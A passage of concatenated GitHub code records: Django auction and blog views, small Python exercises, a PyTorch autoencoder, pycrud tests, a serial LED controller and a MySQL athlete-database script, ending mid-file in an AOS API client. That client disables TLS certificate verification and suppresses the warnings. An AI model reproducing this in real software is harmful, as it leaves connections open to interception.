str(request.user.username).strip(),\n \"error_msg\": \"Bid with higher then the current price\"\n })\n else:\n\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : str(request.user.username).strip(),\n \"error_msg\": \"Bid with higher then the current price\"\n })\n else:\n return render(request, \"auctions/login.html\")\n \ndef close_listing(request, listing_id):\n if request.method ==\"POST\":\n auction_listing = AuctionListing.objects.get(id=listing_id)\n\n if (auction_listing.owner == request.user):\n auction_listing.status = False\n auction_listing.save()\n return render(request, \"auctions/index.html\")\n\ndef comment(request,listing_id):\n if request.method ==\"POST\":\n listing = AuctionListing.objects.get(id=listing_id)\n comment = request.POST['comment']\n comment = Comment(commented_by = request.user, comments = comment, listing = listing)\n comment.save()\n return redirect('listing_page', list_id=listing_id)\n\ndef categories(request):\n category_name = Category.objects.all()\n # auctions = AuctionListing.objects.filter(category=category_name, person=person_name).order_by('id').reverse()\n return render(request, \"auctions/categories.html\",{\n \"categories\" : category_name\n })\n\ndef category_view(request,category): \n auctions = AuctionListing.objects.filter(category=category)\n if auctions:\n return render(request, \"auctions/category.html\",{\n \"listings\" : auctions,\n \"error_msg\": \"No entries in this category\"\n })","repo_name":"HEMANTH-HS-HUGO/Commerce","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74990668261","text":"invval = 0#Savings starts out at 0\nperc = 9 #9 is the annual SP rate of return on average since 1930\npercSal = int(input(\"What percent do you expect your salary to increase annually?\"))\npercSav = int(input(\"What percent of your salary do you expect to put into your portfolio each year?\"))\nsal = int(input(\"What would your starting salary be?\"))\nyears = int(input(\"How many years would you be working for?\"))\nfor i in range(years):\n invval = invval*(1 + 9/100)#Savings natural appreciation\n invval = invval + sal*percSav/100#New amount added per year to savings\n sal = sal*(1 + percSal/100)#salary increase per year\ninvval = round(invval, 2)#Rounding so that we get value in cents\nsal = round(sal,2)#Rounding so that we get value in cents\nprint(\"Savings Value after \", years, \" years is $\", invval)\nprint(\"\\nSalary after \", years, \" years is $\", sal)\nprint(\"The expected income from this portfolio would be\", round(invval*.04,2), \"per year\")\n","repo_name":"C0smicCrush/Simple-Python-Savings-Calculator","sub_path":"savingscalc.py","file_name":"savingscalc.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18155588090","text":"def increment_string(strng):\n if len(strng) == 0: return '1'\n numbers = []\n index = -1\n if strng[-1] in '0123456789':\n if strng[-1] == '9':\n while True:\n index -= 1\n if strng[index] in '0123456789':\n if strng[index] == '0' or strng[index] == '9':\n if strng[index-1] == '0' or strng[index-1] == '9':\n index -= 1\n break\n else:\n break\n number = int(strng[index+1:]) + 1\n return 
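In the auctions views.py record above, `place_bid` calls `bid.save()` before comparing the new price with the listing's current price, so losing bids are persisted anyway. A hedged reordering, assuming the same `Bid` and `AuctionListing` models from that app; this is a sketch, not the app's code:

```python
from decimal import Decimal

from .models import AuctionListing, Bid  # same app models as above


def try_place_bid(listing_id, new_price, user):
    """Persist a bid only when it beats the listing's current price."""
    listing = AuctionListing.objects.get(id=listing_id)
    price = Decimal(new_price)
    if price <= listing.current_price:
        return False  # rejected bids leave no Bid row behind
    Bid.objects.create(bid_price=price, bidding_by=user)
    listing.current_price = price
    listing.save()
    return True
```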
f'{strng[:index+1]}{number}'\n    else:\n        number = int(strng[-1]) + 1\n        return f'{strng[:-1]}{number}'\n    else:\n        return f'{strng}1'\n    \n\n    \n\n\nprint(increment_string('ola600833009879')) #not working (idk why), smt about 3009879","repo_name":"Kanefav/CodeWars","sub_path":"Challenge67.py","file_name":"Challenge67.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37663403654","text":"from bokeh.plotting import figure, output_file, show\n\noutput_file(\"varea.html\")\n\np = figure(plot_width=400, plot_height=400)\n\np.varea(x=[1, 2, 3, 4, 5],\n        y1=[2, 6, 4, 3, 5],\n        y2=[1, 4, 2, 2, 3])\n\nshow(p)\n","repo_name":"SoutiRini/Top-20-Python-Libraries","sub_path":"stuff/finished libraries/bokeh/plotting_varea.py","file_name":"plotting_varea.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"75327939619","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('', views.PostList.as_view()),\n    # path('/', views.single_post_page), # <data_type:variable_name> -> passed to single_post_page as a parameter.\n    path('/', views.PostDetail.as_view()), # <data_type:variable_name> -> passed to single_post_page as a parameter.\n    # path('', views.index)\n    path('/add_comment/', views.add_comment),\n\n    path('category//', views.show_category_posts),\n    path('tag//', views.show_tag_posts),\n\n    path('create_post/', views.PostCreate.as_view()),\n    path('update_post//',views.PostUpdate.as_view() )\n]","repo_name":"auddus16/DjangoBlog","sub_path":"blog_main/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75084436900","text":"# Simple 1 hot representation for each word. Append word vectors for length 10\n# long sentence eg. Encode into single matrix. 
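The Challenge67.py record above ends with the author's own note that the function fails on inputs such as 'ola600833009879'. A compact regex alternative that increments the trailing digit run and preserves zero padding, offered as a sketch rather than the author's solution:

```python
import re


def increment_string(strng):
    # Grab the trailing run of digits, if any; otherwise append "1".
    match = re.search(r'\d+$', strng)
    if match is None:
        return strng + '1'
    digits = match.group()
    head = strng[:match.start()]
    # zfill keeps leading zeros: 'foobar099' -> 'foobar100'
    return head + str(int(digits) + 1).zfill(len(digits))


print(increment_string('ola600833009879'))  # ola600833009880
```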
Decode\n\nimport numpy as np\nfrom torch import relu,device, sigmoid, zeros\nfrom torch.utils.data import DataLoader\nfrom torch.nn import Linear, MSELoss, Module, CrossEntropyLoss, Softmax\nfrom torch.optim import Adam, SGD\n\ndef file_to_tag_list(filename):\n    sentences = []\n    with open(filename, 'r', encoding='utf8') as f:\n        words = []\n        for line in f:\n            line = line.strip()\n\n            if len(line) == 0: \n                while len(words) < sentence_length:\n                    words.append(\"\")\n                sentences.append(words[:sentence_length])\n                words = []\n            else:\n                word, _ = line.split()\n                vocab.add(word)\n                words.append(word)\n    return sentences\n\nvocab = set([\"\"])\nsentence_length = 10\n\ntrain_sentences = file_to_tag_list(\"train.conllu\")\ntest_sentences = file_to_tag_list(\"test.conllu\")\n\nw2i = {w:(i+1) for i,w in enumerate(vocab)}\nw2i[\"\"] = 0\n\ni2w = {i:w for w,i in w2i.items() } \n\nclass AE(Module):\n    def __init__(self, vocab_size, sentence_length):\n        super().__init__()\n        features = vocab_size * sentence_length\n        self.e_hidden = Linear(in_features=features,out_features=128)\n        self.d_output = Linear(in_features=128, out_features=features)\n    \n    def forward(self, features):\n        activation = self.e_hidden(features)\n        activation = sigmoid(activation)\n        activation = self.d_output(activation)\n        return sigmoid(activation)\n\nmodel = AE(len(vocab), sentence_length)\n\nepochs = 10\noptimizer = SGD(model.parameters(), lr=5e-4)\ncriterion = MSELoss()\n\nfor epoch in range(epochs):\n    loss = 0\n    for sentence in train_sentences:\n        sentence = [w2i[w] for w in sentence]\n\n        inputs = zeros(sentence_length, len(vocab))\n\n        for i in range(len(sentence)):\n            idx = sentence[i]\n            inputs[i][idx] = 1\n        inputs = inputs.view(1, -1)\n\n        optimizer.zero_grad()\n\n        outputs = model(inputs)\n\n        train_loss = criterion(outputs, inputs)\n        train_loss.backward()\n        optimizer.step()\n\n        loss += train_loss.item()\n\n    loss = loss / len(train_sentences)\n    \n    print(\"epoch : {}/{}, loss = {:.6f}\".format(epoch+1, epochs, loss))\n\n","repo_name":"Frehaa/Learning","sub_path":"nlp/autoencoder/dum_sentence_autoencoder.py","file_name":"dum_sentence_autoencoder.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31341981546","text":"import json\nfrom typing import Optional\n\nimport peewee\nimport pytest\n\nfrom pycrud.crud.ext.peewee_crud import PeeweeCrud\nfrom pycrud.error import InvalidQueryConditionValue\nfrom pycrud.pydantic_ext.hex_string import HexString\nfrom pycrud.query import QueryInfo, QueryConditions, ConditionExpr\nfrom pycrud.types import RecordMapping\n\npytestmark = [pytest.mark.asyncio]\n\n\nclass ATest(RecordMapping):\n    id: Optional[int]\n    token: HexString\n\n\ndef crud_db_init():\n    from playhouse.db_url import connect\n\n    # create the database\n    # db = connect(\"sqlite:///database.db\")\n    db = connect(\"sqlite:///:memory:\")\n\n    class TestModel(peewee.Model):\n        token = peewee.BlobField()\n\n        class Meta:\n            database = db\n            table_name = 'users'\n\n    db.connect()\n    db.create_tables([TestModel], safe=True)\n\n    TestModel.create(token=b'abcd')\n    TestModel.create(token=b'\\xee\\xff')\n\n    c = PeeweeCrud(None, {\n        ATest: TestModel,\n    }, db)\n\n    return db, c, TestModel\n\n\nasync def test_bytes_read():\n    db, c, TestModel = crud_db_init()\n\n    info = QueryInfo(ATest)\n    info.select = [ATest.token]\n    info.conditions = QueryConditions([])\n\n    ret = await c.get_list(info)\n    assert ret[0].to_dict()['token'] == b'abcd'\n    assert len(ret) == TestModel.select().count()\n\n\nasync def 
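A tiny illustration of the one-hot sentence encoding used by dum_sentence_autoencoder.py above: with a three-slot vocabulary and a sentence length of 2, each word fills one row of a (2, 3) matrix that is then flattened into the autoencoder's input vector. The words here are made up for the example:

```python
from torch import zeros

w2i = {"hello": 1, "world": 2}  # index 0 reserved for padding, as above
sentence = [w2i["hello"], w2i["world"]]

inputs = zeros(2, 3)  # (sentence_length, vocab size)
for i, idx in enumerate(sentence):
    inputs[i][idx] = 1

print(inputs.view(1, -1))  # tensor([[0., 1., 0., 0., 0., 1.]])
```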
test_bytes_query():\n db, c, TestModel = crud_db_init()\n\n info = QueryInfo.from_json(ATest, {\n 'token.eq': b'abcd'\n })\n\n ret = await c.get_list(info)\n assert ret[0].to_dict()['token'] == b'abcd'\n assert len(ret) == TestModel.select().where(TestModel.token == b'abcd').count()\n\n\nasync def test_bytes_query_from_http():\n db, c, TestModel = crud_db_init()\n\n info = QueryInfo.from_json(ATest, {\n 'token.eq': '\"eeff\"'\n }, from_http_query=True)\n\n ret = await c.get_list(info)\n assert ret[0].to_dict()['token'] == b'\\xee\\xff'\n assert len(ret) == TestModel.select().where(TestModel.token == b'\\xee\\xff').count()\n\n\nasync def test_bytes_query_from_http_2():\n # 双重 stringify\n with pytest.raises(InvalidQueryConditionValue):\n info = QueryInfo.from_json(ATest, {\n 'token.eq': '\"\\\\\"5e8c3dea000000051d411585\\\\\"\"'\n }, from_http_query=True)\n\n\nasync def test_bytes_query_memoryview():\n db, c, TestModel = crud_db_init()\n\n info = QueryInfo.from_json(ATest, {\n 'token.eq': memoryview(b'abcd')\n })\n\n ret = await c.get_list(info)\n assert ret[0].to_dict()['token'] == b'abcd'\n assert len(ret) == TestModel.select().where(TestModel.token == b'abcd').count()\n\n\nasync def test_bytes_serializable():\n _, c, _ = crud_db_init()\n assert c.json_dumps_func(b'\\x11\\x22') == '\"1122\"'\n","repo_name":"fy0/pycrud","sub_path":"tests/test_crud_bytes.py","file_name":"test_crud_bytes.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"31763929563","text":"from twisted.internet import defer\n\nfrom mamba.core import templating\nfrom mamba.application import route\nfrom mamba.utils.config import Application\nfrom mamba.web.response import Ok, BadRequest\nfrom mamba.application.controller import Controller\n\nfrom application.lib import smtp\nfrom application import controller\n\n\nclass Contact(Controller):\n \"\"\"\n Contact Controller\n \"\"\"\n\n name = 'Contact'\n __route__ = 'contact'\n\n def __init__(self):\n \"\"\"\n Put your initialization code here\n \"\"\"\n super(Contact, self).__init__()\n\n self.template = templating.Template(controller=self)\n\n @route('/')\n def root(self, request, **kwargs):\n controller.toggle_menu(controller.CONTACT)\n template_args = controller.template_args\n\n return Ok(self.template.render(**template_args).encode('utf-8'))\n\n @route('/form_request', method='POST')\n @defer.inlineCallbacks\n def form_request(self, request, **kwargs):\n\n message = (\n 'New message from {name} <{email}> using contact '\n 'form on main site\\n\\n{content}'.format(\n name=kwargs.get('name'),\n email=kwargs.get('email'),\n content=kwargs.get('content')\n )\n )\n\n result = yield smtp.sendmail(\n message=message,\n subject='[PyMamba] Contact Form Request {}'.format(\n kwargs.get('name')),\n sender='contact@pymamba.com',\n recipients=Application().contact_recipients,\n host='localhost'\n )\n\n retval = Ok({'success': True}) if result is True else BadRequest()\n defer.returnValue(retval)\n","repo_name":"PyMamba/BlackMamba","sub_path":"application/controller/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42021260140","text":"'''\ndomecontroller - module to control the minirti dome\n\n@author: Michael Hodgson\n'''\n\nimport serial\nimport time\nimport logging\n\nclass DomeController:\n def __init__(self):\n self.currentLED = 0\n 
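The pycrud tests above lean on a hex round-trip at the HTTP boundary: the query value '"eeff"' decodes to b'\xee\xff', and `json_dumps_func(b'\x11\x22')` serializes back to '"1122"'. A standalone illustration of that convention:

```python
import json

raw = '"eeff"'  # value as it arrives in an HTTP query string
token = bytes.fromhex(json.loads(raw))  # strip JSON quoting, decode hex
assert token == b'\xee\xff'

# Serializing mirrors it: bytes become a JSON-quoted hex string.
assert json.dumps(token.hex()) == '"eeff"'
```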
self.ser = serial.Serial('/dev/ttyUSB0', 9600)\n # if we try to send data before this delay bytes get lost for some reason\n time.sleep(1.5) \n \n def activateLED(self, ledIndex):\n \"\"\"Activate the single LED given by the ledIndex, NB: The index starts at 0\n ie first LED = 0\"\"\"\n if ledIndex >= 64:\n raise Exception(\"LED index out of bounds\")\n seg = ledIndex // 8\n bitPos = ledIndex % 8\n ledData = []\n for iSeg in range(8):\n byteString = ''\n for iLed in range(8):\n #if iSeg == seg and iLed == bitPos:\n if iLed == bitPos and iSeg == seg:\n byteString += '1'\n else:\n byteString += '0'\n ledData.append(chr(int(byteString, 2)))\n self.sendLEDData(ledData)\n\n def nextLED(self):\n #time.sleep(0.5)\n self.activateLED(self.currentLED)\n self.currentLED += 1\n if self.currentLED >= 64:\n self.currentLED = 0\n\n def resetSequenceClearLEDs(self):\n self.currentLED = 0\n ledData = []\n for i in range(8):\n ledData.append(chr(int('0x00', 16)))\n self.sendLEDData(ledData)\n \n def activateAllLEDs(self):\n self.currentLED = 0\n ledData = []\n for i in range(8):\n ledData.append(chr(int('0xFF', 16)))\n self.sendLEDData(ledData)\n \n \n def sendLEDData(self, data):\n ser = self.ser\n ser.flushInput()\n if len(data) != 8:\n raise Exception(\"LED Data not correct length\")\n #time.sleep(1.5)\n #ser.flush()\n ser.write(chr(int('0x42', 16)))\n #ser.flush()\n for d in data:\n #time.sleep(2)\n ser.write(d)\n #ser.flush()\n logging.debug(\"awaiting response...\")\n while ser.read(1) != chr(int('0x01', 16)):\n pass\n logging.debug(\"response received\") \n\n def close(self):\n self.ser.close()\n \nif __name__ == '__main__':\n dc = DomeController()\n while True:\n dc.nextLED()","repo_name":"michaelwh/rticap","sub_path":"rticap/domecontroller.py","file_name":"domecontroller.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"5078717993","text":"from django.db import models\n\nfrom devices.models import Device\n\n\nclass GpsMeasurement(models.Model):\n device = models.ForeignKey(Device, on_delete=models.CASCADE, related_name='gps_measurement_set')\n latitude = models.DecimalField(max_digits=9, decimal_places=6)\n longitude = models.DecimalField(max_digits=9, decimal_places=6)\n date_collected = models.DateTimeField()\n date_received = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n indexes = [\n models.Index(fields=['date_collected']),\n models.Index(fields=['device', 'date_collected']),\n ]\n ordering = [\n '-date_collected',\n ]\n\n def __str__(self):\n return 'GPS measurement for device {}: {} {} {}'.format(\n self.device,\n self.date_collected,\n self.latitude,\n self.longitude,\n )\n\n","repo_name":"tklos/track","sub_path":"web/track/apps/measurements/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"5902544026","text":"import argparse\nimport torch\nimport data\nimport model\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='PyTorch Wikitext-2 RNN/LSTM/GRU/Transformer Language Model')\n parser.add_argument('--model_path', type=str, default='./models/FNN_adam_tied.dat',\n help='location of the best model')\n parser.add_argument('--data', type=str, default='./data/wikitext-2',\n help='location of the data corpus')\n parser.add_argument('--emsize', type=int, default=200,\n help='size of word embeddings')\n 
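domecontroller.py above writes one-character `chr(...)` strings to the port, which only works on Python 2; under Python 3, pyserial's `write()` expects bytes. A hedged Python 3 rendering of the frame send, with the LED data carried as eight integers rather than eight characters:

```python
# Sketch of a Python 3 sendLEDData; assumes data is eight ints in 0..255.
def send_led_data(ser, data):
    if len(data) != 8:
        raise ValueError("LED data not correct length")
    ser.flushInput()
    ser.write(bytes([0x42]) + bytes(data))  # 0x42 header, then the frame
    while ser.read(1) != b'\x01':  # block until the 0x01 acknowledgement
        pass
```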
parser.add_argument('--ngram_size', type=int, default=8, metavar='N',\n help='ngram size')\n parser.add_argument('--nhid', type=int, default=200,\n help='number of hidden units per layer')\n parser.add_argument('--input', type=str, default='i like fruits and they include some',\n help='input string for inference')\n parser.add_argument('--tied', action='store_true',\n help='Share embedding weights for input and output')\n parser.add_argument('--cuda', action='store_true',\n help='use CUDA')\n return parser\n\n\ndef get_id_of_word(word):\n unknown_word_id = dict_obj.word2idx['']\n return dict_obj.word2idx.get(word, unknown_word_id)\n # return dict_obj.word2idx.get(word)\n\ndef preprocess_test(text):\n # hi my name is cammy i like\n x_extract = [get_id_of_word(word.lower()) for word in text.split()]\n return torch.LongTensor(x_extract)\n\ndef get_preds(best_model, input_tensors, dict_obj):\n prob = best_model(input_tensors)\n prob1 = 10**prob[0]\n\n prob_list = []\n for idx, i in enumerate(list(prob1)):\n prob_list.append((float(i), idx))\n prob_list.sort()\n top3 = prob_list[::-1][:10]\n return [dict_obj.idx2word[idx] for _, idx in top3]\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n print(' ########## GENERATE TEXT ########## ')\n corpus = data.Corpus(args.data)\n dict_obj = corpus.dictionary\n ntokens = len(corpus.dictionary)\n\n best_model_path = args.model_path\n\n if best_model_path.split('.')[-2].split('_')[-1] == 'tied':\n args.tied = True\n\n device = torch.device('cuda') if args.cuda else torch.device('cpu')\n\n input_tensors = preprocess_test(args.input).to(device)\n\n # ---------------------- Loading Best Model -------------------\n best_model = model.FNNmodel(ntokens, args.emsize, args.ngram_size - 1, args.nhid, args.tied).to(device)\n best_model.load_state_dict(torch.load(best_model_path, map_location=device))\n\n preds = get_preds(best_model, input_tensors, dict_obj)\n\n print(\"Next word: \", preds[0])\n","repo_name":"poojasnag/CZ4045_A2","sub_path":"TextGeneration/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16747722908","text":"def sumtrip(ls, n, k):\n dic = dict()\n for i in range(len(ls)):\n dic[ls[i]] = [i, 1]\n for i in range(n - 1):\n for j in range(i + 1, n):\n try:\n if dic[k - ls[i] - ls[j]][1] == 1 and dic[k - ls[i] - ls[j]][0] > j :\n return True\n except:\n pass\n return False\ndef main():\n t: int = int(input())\n while t > 0:\n n, k = map(int, input().split())\n ls: list = list(map(int, input().split()))\n if sumtrip(ls, n, k):\n print(\"YES\")\n else:\n print(\"NO\")\n t -= 1\n\nmain()","repo_name":"SuZuAI/DSA_Python","sub_path":"bobasobangk.py","file_name":"bobasobangk.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"30173004503","text":"import matplotlib.pyplot as plt\r\n\r\ndef add_diet(cnx, fname,lname):\r\n executecur4=cnx.cursor()\r\n cnx.begin()\r\n print(\"Enter the values details of diet of sports player \")\r\n descr = input('Enter diet description: ')\r\n diet_calorie_count=input(\"Enter the calorie count for the above player \")\r\n executecur4.callproc('insert_diet',(diet_calorie_count,fname,lname,descr))\r\n cnx.commit()\r\n print(\"Inserted diet successfully \") \r\n\r\ndef add_brand_end(cnx,fname,lname):\r\n executecur3=cnx.cursor()\r\n cnx.begin()\r\n 
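`get_preds` in inference.py above exponentiates the scores, builds a Python list of (probability, index) pairs, sorts it, and, despite the name `top3`, returns ten words. Since `10**x` is monotonic it cannot change the ranking, so `torch.topk` gives the same ordering directly. A hedged equivalent:

```python
import torch


def get_top_words(best_model, input_tensors, dict_obj, k=10):
    # Assumes best_model returns a (1, vocab) tensor of (log-)scores whose
    # ordering matches the probabilities, as in the script above.
    with torch.no_grad():
        scores = best_model(input_tensors)[0]
    _, indices = torch.topk(scores, k)
    return [dict_obj.idx2word[int(i)] for i in indices]
```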
print(\"Enter the values details of Brand endorsement\")\r\n be_brand_name=input(\"Enter the brand name that player gets endorsed on \")\r\n be_ad_prize=input(\"Enter the prize amount from endorsement \")\r\n executecur3.callproc('insert_brand_endorsements',(be_brand_name,be_ad_prize,fname,lname))\r\n cnx.commit()\r\n print(\"Inserted brand endorsement successfully \") \r\n\r\ndef del_brand_end(cnx,fname,lname):\r\n executecur6=cnx.cursor()\r\n cnx.begin()\r\n be_all_flag = int(input('Delete all brands associated with athlete? Press 1, else 0 '))\r\n if be_all_flag==1:\r\n executecur6.callproc('deletebrandinfo', (fname,lname))\r\n elif be_all_flag==0:\r\n b_name = input('Enter brand name to be deleted ')\r\n executecur6.callproc('deleteonebrand', (fname,lname, b_name))\r\n cnx.commit()\r\n\r\n\r\n\r\ndef add_athlete(cnx):\r\n executecur1=cnx.cursor()\r\n cnx.begin()\r\n\r\n valid_sport=1\r\n while valid_sport==1:\r\n sportname=input(\"Enter the Sport name \")\r\n cur = cnx.cursor()\r\n verify_q = 'SELECT verify_sport(%s)'\r\n cur.execute(verify_q, (sportname))\r\n for row in cur.fetchall():\r\n valid_sport = int(row[0]) \r\n\r\n if valid_sport==1:\r\n break\r\n else:\r\n print('\\nThe entered sport does not exist. Choose from the following sports: ')\r\n s1 = 'SELECT sports_name FROM sports'\r\n cur.execute(s1)\r\n for row in cur.fetchall():\r\n print(row[0])\r\n sportname = input('Enter from above sports: ')\r\n cur.close() \r\n\r\n\r\n valid_team=1\r\n while valid_team==1:\r\n teamname=input(\"Enter the Team name \")\r\n cur = cnx.cursor()\r\n verify_q = 'SELECT verify_team(%s)'\r\n cur.execute(verify_q, (teamname))\r\n for row in cur.fetchall():\r\n valid_team = int(row[0]) \r\n\r\n if valid_team==1:\r\n break\r\n else:\r\n print('\\nThe entered team does not exist. Choose from the following teams: ')\r\n s1 = 'SELECT team_name FROM team t join sports s on(t.team_sports_id=s.sports_id and s.sports_name=%s)'\r\n cur.execute(s1,(sportname))\r\n for row in cur.fetchall():\r\n print(row[0])\r\n teamname = input('Enter from above teams: ')\r\n cur.close() \r\n \r\n\r\n valid_athlete= 1\r\n while valid_athlete==1:\r\n print('Enter athlete details')\r\n athlete_first_name = input('Athlete First Name: ')\r\n athlete_last_name = input('Athlete Last Name: ')\r\n \r\n cur = cnx.cursor()\r\n verify_q = 'SELECT verify_athlete(%s,%s)'\r\n cur.execute(verify_q, (athlete_first_name,athlete_last_name))\r\n for row in cur.fetchall():\r\n valid_athlete = int(row[0]) \r\n\r\n if valid_athlete==0:\r\n break\r\n else:\r\n print('\\nAthlete already exists in the database. Enter another athlete.')\r\n cur.close() \r\n\r\n athlete_mail_id=input(\"Enter the email id of the player \")\r\n athlete_contact_no=input(\"Enter the of the contact number of player \")\r\n athlete_nationality=input(\"Enter the nationality of the player \") \r\n athlete_age=input(\"Enter the age of the player \") \r\n athlete_gender=input(\"Enter the gender of the player \") \r\n athlete_net_worth=input(\"Enter the net worth of the player \") \r\n athlete_position = input('Enter the position of athlete ')\r\n athlete_performance_metric=input(\"Enter the performance metric of the player. (Enter value between 0 to 10) \") \r\n athlete_address=input(\"Enter the address of the player \") \r\n athlete_turned_pro=input(\"Enter the date when player turned proffesional player (yyyy/mm/dd format) \")\r\n athlete_health_score=input(\"Enter the health score of the player. 
(Enter value between 0 to 10) \")\r\n\r\n executecur1.callproc('insert_athlete',(teamname,sportname,athlete_first_name,athlete_last_name,athlete_mail_id,\r\n athlete_contact_no,athlete_nationality,athlete_age,athlete_gender,athlete_net_worth,\r\n athlete_performance_metric,athlete_address,athlete_turned_pro,athlete_health_score, athlete_position))\r\n\r\n \r\n add_diet_flag = 1\r\n while add_diet_flag==1:\r\n add_diet(cnx,athlete_first_name,athlete_last_name)\r\n add_diet_flag=int(input('Add more diet? Press 1, else 0 '))\r\n\r\n add_be_flag = int(input('Does the athlete endorse any brands? Type 1 if yes, else 0: '))\r\n while add_be_flag==1:\r\n add_brand_end(cnx,athlete_first_name,athlete_last_name)\r\n add_be_flag=int(input('Add more Brand endorsements? Press 1, else 0 ')) \r\n cnx.commit() \r\n\r\n\r\ndef plot_stats(cnx):\r\n \r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"select AVG(athlete_net_worth) as networth,\\\r\n sports_name as sports from athlete a join sports s on (a.athlete_sports_id=s.sports_id) group by sports_name\")\r\n result = mycursor.fetchall()\r\n \r\n networth = []\r\n sports = []\r\n \r\n for i in result:\r\n sports.append(i[0])\r\n networth.append(i[1])\r\n print('Sports\\tNet_worth ',i[0],i[1])\r\n cnx.commit()\r\n plt.bar(networth,sports)\r\n plt.xlabel(\"Name of Sports\")\r\n plt.ylabel(\"Avg net worth of the players in millions\")\r\n plt.title(\"Average athlete net worth, Sports-wise\")\r\n plt.show()\r\n\r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"select athlete_net_worth,athlete_perf_score from athlete a join sports s on (a.athlete_sports_id=s.sports_id) where sports_name='Ice Hockey';\")\r\n athlete_net_worth=[]\r\n ath_perf_score=[]\r\n for i in mycursor.fetchall():\r\n athlete_net_worth.append(i[0])\r\n ath_perf_score.append(i[1])\r\n cnx.commit()\r\n\r\n # Add labels and legend\r\n plt.bar(ath_perf_score,athlete_net_worth)\r\n plt.ylabel(\"Athlete Net Worth\")\r\n plt.xlabel(\"Performance score \")\r\n plt.title(\"Athlete Performance Information for Ice Hockey \")\r\n plt.show()\r\n\r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"SELECT s.sports_name, COUNT(DISTINCT e.event_id) AS distinct_event_count FROM\\\r\n events e join sports s on (e.event_sports_id=s.sports_id)WHERE e.event_date BETWEEN '2023-01-01' AND '2023-05-05' GROUP BY s.sports_id;\")\r\n s_name=[]\r\n countg=[]\r\n for i in mycursor.fetchall():\r\n s_name.append(i[0])\r\n countg.append(i[1])\r\n cnx.commit()\r\n\r\n # Add labels and legend\r\n plt.plot(s_name,countg , marker='o', linestyle='-', color='b', label='No Games Played')\r\n plt.ylabel(\"No of events belonging to each sport\")\r\n plt.xlabel(\"Sports Name \")\r\n plt.title(\"Events in the spring season of 2023 \")\r\n plt.legend()\r\n plt.show()\r\n \r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"select event_name , count(distinct(event_country)) as no_of_country from events group by event_name;\")\r\n e_name=[]\r\n countg=[]\r\n for i in mycursor.fetchall():\r\n e_name.append(i[0])\r\n countg.append(i[1])\r\n cnx.commit()\r\n\r\n # Add labels and legend\r\n plt.bar(e_name,countg)\r\n plt.xticks(rotation=45, ha='right')\r\n plt.tight_layout() \r\n plt.ylabel(\"No of distinct countries\")\r\n plt.xlabel(\"Event Name \")\r\n plt.title(\"Most popular event played throughout the world\")\r\n plt.legend()\r\n plt.show()\r\n\r\n mycursor = cnx.cursor()\r\n cnx.begin()\r\n mycursor.execute(\"SELECT diet_description, AVG(diet_calorie_count) AS 
average_calorie_count FROM diet GROUP BY diet_description;\")\r\n diet_description=[]\r\n average_calorie_count=[]\r\n for i in mycursor.fetchall():\r\n diet_description.append(i[0])\r\n average_calorie_count.append(i[1])\r\n cnx.commit()\r\n\r\n plt.pie(average_calorie_count, labels=diet_description, autopct='%1.1f%%', startangle=140)\r\n plt.axis('equal')\r\n plt.title('Distribution of Diet in athletes')\r\n plt.show()\r\n","repo_name":"akacode-hub/Athletico-Web-application","sub_path":"option_apis.py","file_name":"option_apis.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38323104629","text":"#!python3\n\nimport yaml\nimport requests\nimport urllib3\nimport json\nimport sys\nimport time\n\n\nclass AosRz:\n def __init__(self) -> None:\n pass\n\nclass AosBp:\n def __init__(self) -> None:\n pass\n\n\nclass AosServer:\n def __init__(self, host: str, port: int, username: str, password: str, session: requests.Session = None) -> None:\n self.session = session\n urllib3.disable_warnings()\n self.http = urllib3.HTTPSConnectionPool(host, port=port, cert_reqs='CERT_NONE', assert_hostname=False)\n\n self.host = host\n self.port = port\n self.username = username\n self.password = password\n self.json_header = urllib3.response.HTTPHeaderDict({\"Content-Type\": \"application/json\"})\n self._auth()\n self.json_token_header = 